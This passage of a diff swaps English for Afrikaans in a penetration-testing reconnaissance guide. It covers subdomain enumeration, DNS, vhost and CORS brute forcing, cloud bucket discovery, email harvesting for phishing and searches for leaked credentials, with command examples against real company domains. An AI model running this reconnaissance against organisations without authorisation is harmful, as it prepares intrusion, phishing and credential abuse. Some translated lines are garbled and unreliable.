bingapi, bufferoverun, censys, certspotter, crtsh, dnsdumpster, duckduckgo, fullhunt, github-code, google, hackertarget, hunter, intelx, linkedin, linkedin_links, n45ht, omnisint, otx, pentesttools, projectdiscovery, qwant, rapiddns, rocketreach, securityTrails, spyse, sublist3r, threatcrowd, threatminer, trello, twitter, urlscan, virustotal, yahoo, zoomeye" ``` +Daar is **ander interessante gereedskap/API's** wat, alhoewel nie direk gespesialiseer is in die vind van subdomeine nie, nuttig kan wees om subdomeine te vind, soos: 
-There are **other interesting tools/APIs** that even if not directly specialised in finding subdomains could be useful to find subdomains, like: - -* [**Crobat**](https://github.com/cgboal/sonarsearch)**:** Uses the API [https://sonar.omnisint.io](https://sonar.omnisint.io) to obtain subdomains - +* [**Crobat**](https://github.com/cgboal/sonarsearch)**:** Gebruik die API [https://sonar.omnisint.io](https://sonar.omnisint.io) om subdomeine te verkry. ```bash # Get list of subdomains in output from the API ## This is the API the crobat tool will use curl https://sonar.omnisint.io/subdomains/tesla.com | jq -r ".[]" ``` - -* [**JLDC free API**](https://jldc.me/anubis/subdomains/google.com) - +* [**JLDC gratis API**](https://jldc.me/anubis/subdomains/google.com) ```bash curl https://jldc.me/anubis/subdomains/tesla.com | jq -r ".[]" ``` - -* [**RapidDNS**](https://rapiddns.io) free API - +* [**RapidDNS**](https://rapiddns.io) gratis API ```bash # Get Domains from rapiddns free API rapiddns(){ - curl -s "https://rapiddns.io/subdomain/$1?full=1" \ - | grep -oE "[\.a-zA-Z0-9-]+\.$1" \ - | sort -u +curl -s "https://rapiddns.io/subdomain/$1?full=1" \ +| grep -oE "[\.a-zA-Z0-9-]+\.$1" \ +| sort -u } rapiddns tesla.com ``` - * [**https://crt.sh/**](https://crt.sh) - ```bash # Get Domains from crt free API crt(){ - curl -s "https://crt.sh/?q=%25.$1" \ - | grep -oE "[\.a-zA-Z0-9-]+\.$1" \ - | sort -u +curl -s "https://crt.sh/?q=%25.$1" \ +| grep -oE "[\.a-zA-Z0-9-]+\.$1" \ +| sort -u } crt tesla.com ``` - -* [**gau**](https://github.com/lc/gau)**:** fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl for any given domain. - +* [**gau**](https://github.com/lc/gau)**:** haal bekende URL's op van AlienVault se Open Threat Exchange, die Wayback Machine, en Common Crawl vir enige gegewe domein. 
```bash # Get subdomains from GAUs found URLs gau --subs tesla.com | cut -d "/" -f 3 | sort -u ``` - -* [**SubDomainizer**](https://github.com/nsonaniya2010/SubDomainizer) **&** [**subscraper**](https://github.com/Cillian-Collins/subscraper): They scrap the web looking for JS files and extract subdomains from there. - +* [**SubDomainizer**](https://github.com/nsonaniya2010/SubDomainizer) **&** [**subscraper**](https://github.com/Cillian-Collins/subscraper): Hulle skraap die web op soek na JS-lêers en onttrek subdomeine daaruit. ```bash # Get only subdomains from SubDomainizer python3 SubDomainizer.py -u https://tesla.com | grep tesla.com 
@@ -355,42 +307,35 @@ python3 SubDomainizer.py -u https://tesla.com | grep tesla.com # Get only subdomains from subscraper, this already perform recursion over the found results python subscraper.py -u tesla.com | grep tesla.com | cut -d " " -f ``` - * [**Shodan**](https://www.shodan.io/) - ```bash # Get info about the domain shodan domain # Get other pages with links to subdomains shodan search "http.html:help.domain.com" ``` - -* [**Censys subdomain finder**](https://github.com/christophetd/censys-subdomain-finder) - +* [**Censys subdomein vindprogram**](https://github.com/christophetd/censys-subdomain-finder) ```bash export CENSYS_API_ID=... export CENSYS_API_SECRET=... python3 censys-subdomain-finder.py tesla.com ``` - * [**DomainTrail.py**](https://github.com/gatete/DomainTrail) - ```bash python3 DomainTrail.py -d example.com ``` - -* [**securitytrails.com**](https://securitytrails.com/) has a free API to search for subdomains and IP history +* [**securitytrails.com**](https://securitytrails.com/) het 'n gratis API om na subdomeine en IP-geskiedenis te soek * [**chaos.projectdiscovery.io**](https://chaos.projectdiscovery.io/#/) -This project offers for **free all the subdomains related to bug-bounty programs**. You can access this data also using [chaospy](https://github.com/dr-0x0x/chaospy) or even access the scope used by this project [https://github.com/projectdiscovery/chaos-public-program-list](https://github.com/projectdiscovery/chaos-public-program-list) +Hierdie projek bied **gratis alle subdomeine wat verband hou met fout-vondsprogramme**. 
Jy kan ook toegang tot hierdie data verkry deur [chaospy](https://github.com/dr-0x0x/chaospy) te gebruik of selfs toegang te verkry tot die omvang wat deur hierdie projek gebruik word [https://github.com/projectdiscovery/chaos-public-program-list](https://github.com/projectdiscovery/chaos-public-program-list) -You can find a **comparison** of many of these tools here: [https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off](https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off) +Jy kan 'n **vergelyking** van baie van hierdie gereedskap hier vind: [https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off](https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off) ### **DNS Brute force** -Let's try to find new **subdomains** brute-forcing DNS servers using possible subdomain names. +Laat ons probeer om nuwe **subdomeine** te vind deur DNS-bedieners te dwing met behulp van moontlike subdomeinname. -For this action you will need some **common subdomains wordlists like**: +Vir hierdie aksie sal jy 'n paar **gewone subdomeinwoordlyste soos** nodig hê: * [https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056) * [https://wordlists-cdn.assetnote.io/data/manual/best-dns-wordlist.txt](https://wordlists-cdn.assetnote.io/data/manual/best-dns-wordlist.txt) 
@@ -398,118 +343,93 @@ For this action you will need some **common subdomains wordlists like**: * [https://github.com/pentester-io/commonspeak](https://github.com/pentester-io/commonspeak) * [https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS](https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS) -And also IPs of good DNS resolvers. In order to generate a list of trusted DNS resolvers you can download the resolvers from [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) and use [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) to filter them. Or you could use: [https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt](https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt) +En ook IP-adresse van goeie DNS-oplossers. Om 'n lys van vertroude DNS-oplossers te genereer, kan jy die oplossers aflaai vanaf [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) en [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) gebruik om hulle te filtreer. Of jy kan gebruik maak van: [https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt](https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt) -The most recommended tools for DNS brute-force are: - -* [**massdns**](https://github.com/blechschmidt/massdns): This was the first tool that performed an effective DNS brute-force. It's very fast however it's prone to false positives. +Die mees aanbevole gereedskap vir DNS-brute force is: +* [**massdns**](https://github.com/blechschmidt/massdns): Dit was die eerste gereedskap wat 'n doeltreffende DNS-brute force uitgevoer het. Dit is baie vinnig, maar dit is geneig om vals positiewe resultate te gee. ```bash sed 's/$/.domain.com/' subdomains.txt > bf-subdomains.txt ./massdns -r resolvers.txt -w /tmp/results.txt bf-subdomains.txt grep -E "tesla.com. 
[0-9]+ IN A .+" /tmp/results.txt ``` - -* [**gobuster**](https://github.com/OJ/gobuster): This one I think just uses 1 resolver - +* [**gobuster**](https://github.com/OJ/gobuster): Ek dink hierdie een gebruik net 1 oplosser ``` gobuster dns -d mysite.com -t 50 -w subdomains.txt ``` - -* [**shuffledns**](https://github.com/projectdiscovery/shuffledns) is a wrapper around `massdns`, written in go, that allows you to enumerate valid subdomains using active bruteforce, as well as resolve subdomains with wildcard handling and easy input-output support. - +* [**shuffledns**](https://github.com/projectdiscovery/shuffledns) is 'n omhulsel rondom `massdns`, geskryf in go, wat jou in staat stel om geldige subdomeine op te som deur middel van aktiewe bruteforce, asook om subdomeine op te los met wildcard hantering en maklike in-uitset ondersteuning. ``` shuffledns -d example.com -list example-subdomains.txt -r resolvers.txt ``` - -* [**puredns**](https://github.com/d3mondev/puredns): It also uses `massdns`. - +* [**puredns**](https://github.com/d3mondev/puredns): Dit maak ook gebruik van `massdns`. ``` puredns bruteforce all.txt domain.com ``` - -* [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) uses asyncio to brute force domain names asynchronously. - +* [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) gebruik asyncio om domeinname asinkronies te brute force. ``` aiodnsbrute -r resolvers -w wordlist.txt -vv -t 1024 domain.com ``` +### Tweede DNS Brute-Force Ronde -### Second DNS Brute-Force Round - -After having found subdomains using open sources and brute-forcing, you could generate alterations of the subdomains found to try to find even more. Several tools are useful for this purpose: - -* [**dnsgen**](https://github.com/ProjectAnte/dnsgen)**:** Given the domains and subdomains generate permutations. 
+Nadat jy subdomeine gevind het deur gebruik te maak van oop bronne en brute-force, kan jy variasies van die gevonde subdomeine genereer om te probeer om selfs meer te vind. Verskeie hulpmiddels is nuttig vir hierdie doel: +* [**dnsgen**](https://github.com/ProjectAnte/dnsgen)**:** Gee die domeine en subdomeine en genereer permutasies. ```bash cat subdomains.txt | dnsgen - ``` - -* [**goaltdns**](https://github.com/subfinder/goaltdns): Given the domains and subdomains generate permutations. - * You can get goaltdns permutations **wordlist** in [**here**](https://github.com/subfinder/goaltdns/blob/master/words.txt). - +* [**goaltdns**](https://github.com/subfinder/goaltdns): Gee die domeine en subdomeine en genereer permutasies. +* Jy kan die goaltdns permutasies **woordelys** hier kry [**hier**](https://github.com/subfinder/goaltdns/blob/master/words.txt). ```bash goaltdns -l subdomains.txt -w /tmp/words-permutations.txt -o /tmp/final-words-s3.txt ``` - -* [**gotator**](https://github.com/Josue87/gotator)**:** Given the domains and subdomains generate permutations. If not permutations file is indicated gotator will use its own one. - +* [**gotator**](https://github.com/Josue87/gotator)**:** Gee die domeine en subdomeine en genereer permutasies. As geen permutasie lêer aangedui word nie, sal gotator sy eie een gebruik. ``` gotator -sub subdomains.txt -silent [-perm /tmp/words-permutations.txt] ``` - -* [**altdns**](https://github.com/infosec-au/altdns): Apart from generating subdomains permutations, it can also try to resolve them (but it's better to use the previous commented tools). - * You can get altdns permutations **wordlist** in [**here**](https://github.com/infosec-au/altdns/blob/master/words.txt). - +* [**altdns**](https://github.com/infosec-au/altdns): Afgesien van die generering van subdomein-permutasies, kan dit ook probeer om hulle op te los (maar dit is beter om die vorige genoemde gereedskap te gebruik). 
+* Jy kan die altdns permutasies **woordelys** hier kry [**hier**](https://github.com/infosec-au/altdns/blob/master/words.txt). ``` altdns -i subdomains.txt -w /tmp/words-permutations.txt -o /tmp/asd3 ``` - -* [**dmut**](https://github.com/bp0lr/dmut): Another tool to perform permutations, mutations and alteration of subdomains. This tool will brute force the result (it doesn't support dns wild card). - * You can get dmut permutations wordlist in [**here**](https://raw.githubusercontent.com/bp0lr/dmut/main/words.txt). - +* [**dmut**](https://github.com/bp0lr/dmut): 'n Ander instrument om permutasies, mutasies en verandering van subdomeine uit te voer. Hierdie instrument sal die resultaat met geweld afdwing (dit ondersteun nie dns-wildkaart nie). +* Jy kan die dmut-permutasies-woordelys hier kry [**hier**](https://raw.githubusercontent.com/bp0lr/dmut/main/words.txt). ```bash cat subdomains.txt | dmut -d /tmp/words-permutations.txt -w 100 \ - --dns-errorLimit 10 --use-pb --verbose -s /tmp/resolvers-trusted.txt +--dns-errorLimit 10 --use-pb --verbose -s /tmp/resolvers-trusted.txt ``` +* [**alterx**](https://github.com/projectdiscovery/alterx)**:** Gebaseer op 'n domein, **genereer dit nuwe potensiële subdomeinname** gebaseer op aangeduide patrone om meer subdomeine te ontdek. -* [**alterx**](https://github.com/projectdiscovery/alterx)**:** Based on a domain it **generates new potential subdomains names** based on indicated patterns to try to discover more subdomains. - -#### Smart permutations generation - -* [**regulator**](https://github.com/cramppet/regulator): For more info read this [**post**](https://cramppet.github.io/regulator/index.html) but it will basically get the **main parts** from the **discovered subdomains** and will mix them to find more subdomains. 
+#### Slim permutasie generasie +* [**regulator**](https://github.com/cramppet/regulator): Vir meer inligting lees hierdie [**pos**](https://cramppet.github.io/regulator/index.html), maar dit sal basies die **hoofdele** van die **ontdekte subdomeine** kry en meng om meer subdomeine te vind. ```bash python3 main.py adobe.com adobe adobe.rules make_brute_list.sh adobe.rules adobe.brute puredns resolve adobe.brute --write adobe.valid ``` - -* [**subzuf**](https://github.com/elceef/subzuf)**:** _subzuf_ is a subdomain brute-force fuzzer coupled with an immensly simple but effective DNS reponse-guided algorithm. It utilizes a provided set of input data, like a tailored wordlist or historical DNS/TLS records, to accurately synthesize more corresponding domain names and expand them even further in a loop based on information gathered during DNS scan. - +* [**subzuf**](https://github.com/elceef/subzuf)**:** _subzuf_ is 'n subdomein brute-force fuzzer wat gekoppel is aan 'n eenvoudige maar effektiewe DNS-respons-geleide algoritme. Dit maak gebruik van 'n voorsiene stel insetdata, soos 'n op maat gemaakte woordelys of historiese DNS/TLS-rekords, om akkuraat meer ooreenstemmende domeinname te sintetiseer en hulle verder uit te brei in 'n lus gebaseer op inligting wat tydens die DNS-scan ingesamel is. 
``` echo www | subzuf facebook.com ``` +### **Subdomein Ontdekkingswerkstroom** -### **Subdomain Discovery Workflow** - -Check this blog post I wrote about how to **automate the subdomain discovery** from a domain using **Trickest workflows** so I don't need to launch manually a bunch of tools in my computer: +Kyk na hierdie blogpos wat ek geskryf het oor hoe om die ontdekking van subdomeine outomaties te maak deur gebruik te maak van Trickest-werkstrome sodat ek nie handmatig 'n klomp gereedskap op my rekenaar hoef te begin nie: {% embed url="https://trickest.com/blog/full-subdomain-discovery-using-workflow/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} {% embed url="https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -### **VHosts / Virtual Hosts** +### **VHosts / Virtuele Gasheer** -If you found an IP address containing **one or several web pages** belonging to subdomains, you could try to **find other subdomains with webs in that IP** by looking in **OSINT sources** for domains in an IP or by **brute-forcing VHost domain names in that IP**. +As jy 'n IP-adres gevind het wat een of verskeie webbladsye bevat wat aan subdomeine behoort, kan jy probeer om ander subdomeine met webbladsye in daardie IP te vind deur in OSINT-bronne te kyk vir domeine in 'n IP of deur VHost-domeinname in daardie IP te brute force. #### OSINT -You can find some **VHosts in IPs using** [**HostHunter**](https://github.com/SpiderLabs/HostHunter) **or other APIs**. +Jy kan sommige VHosts in IP's vind deur gebruik te maak van [HostHunter](https://github.com/SpiderLabs/HostHunter) of ander API's. 
**Brute Force** -If you suspect that some subdomain can be hidden in a web server you could try to brute force it: - +As jy vermoed dat 'n subdomein dalk weggesteek is op 'n webbediener, kan jy probeer om dit deur brute force te vind: ```bash ffuf -c -w /path/to/wordlist -u http://victim.com -H "Host: FUZZ.victim.com" 
@@ -523,219 +443,211 @@ vhostbrute.py --url="example.com" --remoteip="10.1.1.15" --base="www.example.com #https://github.com/codingo/VHostScan VHostScan -t example.com ``` - {% hint style="info" %} -With this technique you may even be able to access internal/hidden endpoints. +Met hierdie tegniek kan jy selfs toegang kry tot interne/verborge eindpunte. {% endhint %} ### **CORS Brute Force** -Sometimes you will find pages that only return the header _**Access-Control-Allow-Origin**_ when a valid domain/subdomain is set in the _**Origin**_ header. In these scenarios, you can abuse this behaviour to **discover** new **subdomains**. - +Soms sal jy bladsye vind wat slegs die _**Access-Control-Allow-Origin**_ kop _teruggee wanneer 'n geldige domein/subdomein in die _**Origin**_ kop ingestel is. In hierdie scenario's kan jy hierdie gedrag misbruik om nuwe **subdomeine** te **ontdek**. ```bash ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http://FUZZ.crossfit.htb' -mr "Access-Control-Allow-Origin" -ignore-body ``` +### **Emmers Brute Force** -### **Buckets Brute Force** +Terwyl jy soek na **subdomeine**, hou 'n oog uit om te sien of dit na enige soort **emmer** verwys, en in daardie geval [**kontroleer die toestemmings**](../../network-services-pentesting/pentesting-web/buckets/)**.**\ +Verder, aangesien jy op hierdie punt al die domeine binne die omvang sal ken, probeer [**brute force moontlike emmernaam en kontroleer die toestemmings**](../../network-services-pentesting/pentesting-web/buckets/). -While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/)**.**\ -Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](../../network-services-pentesting/pentesting-web/buckets/). 
+### **Monitorisering** -### **Monitorization** +Jy kan **monitor** of **nuwe subdomeine** van 'n domein geskep word deur die **Sertifikaat Transparancy** Logboeke te monitor [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)doen. -You can **monitor** if **new subdomains** of a domain are created by monitoring the **Certificate Transparency** Logs [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)does. +### **Op soek na kwesbaarhede** -### **Looking for vulnerabilities** +Kyk vir moontlike [**subdomein-oorgawes**](../../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).\ +As die **subdomein** na 'n **S3-emmer** verwys, [**kontroleer die toestemmings**](../../network-services-pentesting/pentesting-web/buckets/). -Check for possible [**subdomain takeovers**](../../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).\ -If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/). +As jy enige **subdomein met 'n ander IP** as diegene wat jy reeds in die batesontdekking gevind het, moet jy 'n **basiese kwesbaarheidsskandering** (met behulp van Nessus of OpenVAS) en 'n paar [**poortskenning**](../pentesting-network/#discovering-hosts-from-the-outside) doen met **nmap/masscan/shodan**. Afhangende van watter dienste loop, kan jy in **hierdie boek 'n paar truuks vind om hulle te "aanval"**.\ +Merk op dat die subdomein soms gehuisves word binne 'n IP wat nie deur die kliënt beheer word nie, so dit is nie binne die omvang nie, wees versigtig. -If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. 
Depending on which services are running you can find in **this book some tricks to "attack" them**.\ -_Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._ +## IP's -## IPs +In die aanvanklike stappe het jy dalk **sekere IP-reekse, domeine en subdomeine gevind**.\ +Dit is tyd om al die IP's van daardie reekse te **versamel** en vir die **domeine/subdomeine (DNS-navrae)**. -In the initial steps you might have **found some IP ranges, domains and subdomains**.\ -It’s time to **recollect all the IPs from those ranges** and for the **domains/subdomains (DNS queries).** - -Using services from the following **free apis** you can also find **previous IPs used by domains and subdomains**. These IPs might still be owned by the client (and might allow you to find [**CloudFlare bypasses**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md)) +Deur dienste van die volgende **gratis API's** te gebruik, kan jy ook **vorige IP's wat deur domeine en subdomeine gebruik is**, vind. Hierdie IP's mag steeds deur die kliënt besit word (en mag jou in staat stel om [**CloudFlare-omseilings**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md) te vind) * [**https://securitytrails.com/**](https://securitytrails.com/) -You can also check for domains pointing a specific IP address using the tool [**hakip2host**](https://github.com/hakluke/hakip2host) +Jy kan ook vir domeine wat na 'n spesifieke IP-adres verwys, kyk deur die hulpmiddel [**hakip2host**](https://github.com/hakluke/hakip2host) te gebruik. -### **Looking for vulnerabilities** +### **Op soek na kwesbaarhede** -**Port scan all the IPs that doesn’t belong to CDNs** (as you highly probably won’t find anything interested in there). In the running services discovered you might be **able to find vulnerabilities**. 
+**Poortsken al die IP's wat nie aan CDN's behoort nie** (aangesien jy waarskynlik niks interessants daar sal vind nie). In die ontdekte lopende dienste kan jy **kwesbaarhede vind**. -**Find a** [**guide**](../pentesting-network/) **about how to scan hosts.** +**Vind 'n** [**gids**](../pentesting-network/) **oor hoe om gasheer te skandeer.** -## Web servers hunting +## Soek na webbedieners -> We have found all the companies and their assets and we know IP ranges, domains and subdomains inside the scope. It's time to search for web servers. +> Ons het al die maatskappye en hul bates gevind en ons ken IP-reekse, domeine en subdomeine binne die omvang. Dit is tyd om na webbedieners te soek. -In the previous steps you have probably already performed some **recon of the IPs and domains discovered**, so you may have **already found all the possible web servers**. However, if you haven't we are now going to see some **fast tricks to search for web servers** inside the scope. +In die vorige stappe het jy waarskynlik al 'n bietjie **rekognisering van die ontdekte IP's en domeine** gedoen, so jy het dalk **al die moontlike webbedieners al gevind**. As jy dit egter nie gedoen het nie, gaan ons nou kyk na 'n paar **vinnige truuks om na webbedieners** binne die omvang te soek. -Please, note that this will be **oriented for web apps discovery**, so you should **perform the vulnerability** and **port scanning** also (**if allowed** by the scope). - -A **fast method** to discover **ports open** related to **web** servers using [**masscan** can be found here](../pentesting-network/#http-port-discovery).\ -Another friendly tool to look for web servers is [**httprobe**](https://github.com/tomnomnom/httprobe)**,** [**fprobe**](https://github.com/theblackturtle/fprobe) and [**httpx**](https://github.com/projectdiscovery/httpx). You just pass a list of domains and it will try to connect to port 80 (http) and 443 (https). 
Additionally, you can indicate to try other ports: +Let asseblief daarop dat dit **georiënteer sal wees vir die ontdekking van webtoepassings**, so jy moet ook die **kwesbaarheid** en **poortskenning** uitvoer (**as toegelaat** deur die omvang). +'n **Vinnige metode** om **oop poorte** wat verband hou met **webbedieners** te ontdek deur gebruik te maak van [**masscan** kan hier gevind word](../pentesting-network/#http-port-discovery).\ +'n Ander vriendelike hulpmiddel om na webbedieners te soek is [**httprobe**](https://github.com/tomnomnom/httprobe)**,** [**fprobe**](https://github.com/theblackturtle/fprobe) en [**httpx**](https://github.com/projectdiscovery/httpx). Jy stuur net 'n lys domeine en dit sal probeer om aan te sluit by poort 80 (http) en 443 (https). Daarbenewens kan jy aandui om ander poorte te probeer: ```bash cat /tmp/domains.txt | httprobe #Test all domains inside the file for port 80 and 443 cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 and 8080 and 8443 ``` +### **Skermfoto's** -### **Screenshots** +Nou dat jy al die webbedieners in die omvang ontdek het (onder die IP-adresse van die maatskappy en al die domeine en subdomeine), weet jy waarskynlik nie waar om te begin nie. So, maak dit eenvoudig en begin net deur skermfoto's van almal te neem. Deur net na die hoofbladsy te kyk, kan jy vreemde eindpunte vind wat meer geneig is om kwesbaar te wees. -Now that you have discovered **all the web servers** present in the scope (among the **IPs** of the company and all the **domains** and **subdomains**) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just by **taking a look** at the **main page** you can find **weird** endpoints that are more **prone** to be **vulnerable**. 
+Om die voorgestelde idee uit te voer, kan jy [EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness), [HttpScreenshot](https://github.com/breenmachine/httpscreenshot), [Aquatone](https://github.com/michenriksen/aquatone), [Shutter](https://shutter-project.org/downloads/third-party-packages/) of [webscreenshot](https://github.com/maaaaz/webscreenshot) gebruik. -To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), [**Aquatone**](https://github.com/michenriksen/aquatone), [**Shutter**](https://shutter-project.org/downloads/third-party-packages/) or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.** +Verder kan jy dan [eyeballer](https://github.com/BishopFox/eyeballer) gebruik om deur al die skermfoto's te loop om jou te vertel wat waarskynlik kwesbaarhede bevat, en wat nie. -Moreover, you could then use [**eyeballer**](https://github.com/BishopFox/eyeballer) to run over all the **screenshots** to tell you **what's likely to contain vulnerabilities**, and what isn't. +## Openbare Cloud Bates -## Public Cloud Assets +Om potensiële cloud bates wat aan 'n maatskappy behoort, te vind, moet jy begin met 'n lys sleutelwoorde wat daardie maatskappy identifiseer. Byvoorbeeld, vir 'n kriptomaatskappy kan jy woorde soos "crypto", "wallet", "dao", "", "" gebruik. -In order to find potential cloud assets belonging to a company you should **start with a list of keywords that identify that company**. For example, a crypto for a crypto company you might use words such as: `"crypto", "wallet", "dao", "", <"subdomain_names">`. 
- -You will also need wordlists of **common words used in buckets**: +Jy sal ook woordlyste van algemene woorde wat in emmers gebruik word, benodig: * [https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt](https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt) * [https://raw.githubusercontent.com/infosec-au/altdns/master/words.txt](https://raw.githubusercontent.com/infosec-au/altdns/master/words.txt) * [https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt](https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt) -Then, with those words you should generate **permutations** (check the [**Second Round DNS Brute-Force**](./#second-dns-bruteforce-round) for more info). +Met daardie woorde moet jy dan permutasies genereer (sien die [Tweede Ronde DNS Brute-Force](./#second-dns-bruteforce-round) vir meer inligting). -With the resulting wordlists you could use tools such as [**cloud\_enum**](https://github.com/initstring/cloud\_enum)**,** [**CloudScraper**](https://github.com/jordanpotti/CloudScraper)**,** [**cloudlist**](https://github.com/projectdiscovery/cloudlist) **or** [**S3Scanner**](https://github.com/sa7mon/S3Scanner)**.** +Met die resulterende woordlyste kan jy gereedskap soos [cloud_enum](https://github.com/initstring/cloud_enum), [CloudScraper](https://github.com/jordanpotti/CloudScraper), [cloudlist](https://github.com/projectdiscovery/cloudlist) of [S3Scanner](https://github.com/sa7mon/S3Scanner) gebruik. -Remember that when looking for Cloud Assets you should l**ook for more than just buckets in AWS**. +Onthou dat wanneer jy na Cloud Bates soek, jy na meer as net emmers in AWS moet kyk. -### **Looking for vulnerabilities** +### **Op soek na kwesbaarhede** -If you find things such as **open buckets or cloud functions exposed** you should **access them** and try to see what they offer you and if you can abuse them. 
+As jy dinge soos oop emmers of blootgestelde cloudfunksies vind, moet jy toegang daartoe verkry en probeer sien wat hulle bied en of jy dit kan misbruik. -## Emails +## E-posse -With the **domains** and **subdomains** inside the scope you basically have all what you **need to start searching for emails**. These are the **APIs** and **tools** that have worked the best for me to find emails of a company: +Met die domeine en subdomeine binne die omvang het jy basies alles wat jy nodig het om na e-posse te soek. Hier is die API's en gereedskap wat die beste vir my gewerk het om e-posse van 'n maatskappy te vind: -* [**theHarvester**](https://github.com/laramies/theHarvester) - with APIs -* API of [**https://hunter.io/**](https://hunter.io/) (free version) -* API of [**https://app.snov.io/**](https://app.snov.io/) (free version) -* API of [**https://minelead.io/**](https://minelead.io/) (free version) +* [theHarvester](https://github.com/laramies/theHarvester) - met API's +* API van [https://hunter.io/](https://hunter.io/) (gratis weergawe) +* API van [https://app.snov.io/](https://app.snov.io/) (gratis weergawe) +* API van [https://minelead.io/](https://minelead.io/) (gratis weergawe) -### **Looking for vulnerabilities** +### **Op soek na kwesbaarhede** -Emails will come handy later to **brute-force web logins and auth services** (such as SSH). Also, they are needed for **phishings**. Moreover, these APIs will give you even more **info about the person** behind the email, which is useful for the phishing campaign. +E-posse sal later handig wees om webaanmeldings en outentiseringsdienste (soos SSH) met brute force aan te val. Hulle is ook nodig vir hengelpraktyke. Verder sal hierdie API's jou selfs meer inligting gee oor die persoon agter die e-pos, wat nuttig is vir die hengelveldtog. 
-## Credential Leaks +## Kredensialek -With the **domains,** **subdomains**, and **emails** you can start looking for credentials leaked in the past belonging to those emails: +Met die domeine, subdomeine en e-posse kan jy begin soek na kredensiale wat in die verlede uitgelek het en aan daardie e-posse behoort: * [https://leak-lookup.com](https://leak-lookup.com/account/login) * [https://www.dehashed.com/](https://www.dehashed.com/) -### **Looking for vulnerabilities** +### **Op soek na kwesbaarhede** -If you find **valid leaked** credentials, this is a very easy win. +As jy geldige uitgelekte kredensiale vind, is dit 'n baie maklike oorwinning. -## Secrets Leaks +## Geheimlek -Credential leaks are related to hacks of companies where **sensitive information was leaked and sold**. However, companies might be affected for **other leaks** whose info isn't in those databases: +Kredensialeks is verband hou met hacks van maatskappye waarby sensitiewe inligting uitgelek en verkoop is. Maatskappye kan egter deur ander lekke geraak word waarvan die inligting nie in daardie databasisse is nie: -### Github Leaks +### Github-lekke -Credentials and APIs might be leaked in the **public repositories** of the **company** or of the **users** working by that github company.\ -You can use the **tool** [**Leakos**](https://github.com/carlospolop/Leakos) to **download** all the **public repos** of an **organization** and of its **developers** and run [**gitleaks**](https://github.com/zricethezav/gitleaks) over them automatically. +Kredensiale en API's kan uitgelek word in die openbare bewaarplekke van die maatskappy of van die gebruikers wat vir daardie Github-maatskappy werk. Jy kan die gereedskap [Leakos](https://github.com/carlospolop/Leakos) gebruik om al die openbare bewaarplekke van 'n organisasie en sy ontwikkelaars af te laai en outomaties [gitleaks](https://github.com/zricethezav/gitleaks) daaroor te hardloop. 
-**Leakos** can also be used to run **gitleaks** agains all the **text** provided **URLs passed** to it as sometimes **web pages also contains secrets**. +Leakos kan ook gebruik word om gitleaks teen al die teksverskaffings-URL's wat aan hom oorgedra word, te hardloop, aangesien webbladsye soms ook geheime bevat. #### Github Dorks -Check also this **page** for potential **github dorks** you could also search for in the organization you are attacking: +Kyk ook na hierdie bladsy vir potensiële Github Dorks wat jy ook in die organisasie wat jy aanval, kan soek: {% content-ref url="github-leaked-secrets.md" %} [github-leaked-secrets.md](github-leaked-secrets.md) {% endcontent-ref %} -### Pastes Leaks +### Pastes-lekke -Sometimes attackers or just workers will **publish company content in a paste site**. This might or might not contain **sensitive information**, but it's very interesting to search for it.\ -You can use the tool [**Pastos**](https://github.com/carlospolop/Pastos) to search in more that 80 paste sites at the same time. +Soms sal aanvallers of net werkers maatskappy-inhoud op 'n plakkerswebwerf publiseer. Dit mag wel of nie sensitiewe inligting bevat nie, maar dit is baie interessant om daarna te soek. Jy kan die gereedskap [Pastos](https://github.com/carlospolop/Pastos) gebruik om 